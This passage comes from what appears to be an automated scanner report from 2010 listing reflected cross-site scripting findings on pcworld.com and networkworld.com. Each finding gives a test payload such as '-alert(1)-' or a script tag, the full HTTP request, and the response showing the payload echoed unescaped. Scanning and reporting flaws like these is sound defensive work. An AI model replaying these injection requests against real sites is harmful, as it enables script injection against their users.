Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,801749642-sortby,retailer/pricing.html64792'-alert(1)-'59443ff790';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.192. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dbf'-alert(1)-'364c1610e16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping50dbf'-alert(1)-'364c1610e16/detail/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:14 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=DD31E901CDB09A762BEC2712F70E90A3; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:14 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping50dbf'-alert(1)-'364c1610e16/detail/prtprdid,813735600-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer +=
...[SNIP]...

1.193. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 34085'-alert(1)-'17275b632a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail34085'-alert(1)-'17275b632a2/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:33 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=99B0DF6C3EE34E02568E31DBC751D08F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail34085'-alert(1)-'17275b632a2/prtprdid,813735600-sortby,retailer/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += Remembe
...[SNIP]...

1.194. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c266a"><script>alert(1)</script>12c60b7e20e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detailc266a"><script>alert(1)</script>12c60b7e20e/prtprdid,813735600-sortby,retailer/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:32 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5C977E9B2482ABF3F6BB4AB3E77DC35C; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detailc266a"><script>alert(1)</script>12c60b7e20e/prtprdid,813735600-sortby,retailer/pricing.html"/>
...[SNIP]...

1.195. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1684'-alert(1)-'eba418560f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailere1684'-alert(1)-'eba418560f0/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:39 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=174C251B460340D592BCD91A7BE75F87; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,813735600-sortby,retailere1684'-alert(1)-'eba418560f0/pricing.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.196. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc032"><script>alert(1)</script>e80f389cb9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailerfc032"><script>alert(1)</script>e80f389cb9d/pricing.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:17:37 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
<meta property="og:url" content="/shopping/detail/prtprdid,813735600-sortby,retailerfc032"><script>alert(1)</script>e80f389cb9d/pricing.html"/>
...[SNIP]...

1.197. http://www.pcworld.com/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload babbd'-alert(1)-'aaae06b3f1a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /shopping/detail/prtprdid,813735600-sortby,retailer/pricing.htmlbabbd'-alert(1)-'aaae06b3f1a HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=307575129A47AE93470C910895D5F93A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:17:40 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xm
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/shopping/detail/prtprdid,813735600-sortby,retailer/pricing.htmlbabbd'-alert(1)-'aaae06b3f1a';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.198. http://www.networkworld.com/ [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.networkworld.com
Path:	/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e168'-alert(1)-'1859bab3eba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9e168'-alert(1)-'1859bab3eba

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Mon, 15 Nov 2010 22:10:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:10:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1289859013739132; path=/; expires=Wed, 14-Nov-12 22:10:13 GMT
Content-Length: 208695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
eneral',
           rxsubtopicname: '',
           pgtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: 'http://www.google.com/search?hl=en&q=9e168'-alert(1)-'1859bab3eba',
nwchannel: 'Network World',
request_uri: '/',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''
};

...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 18:11:43 CST 2010.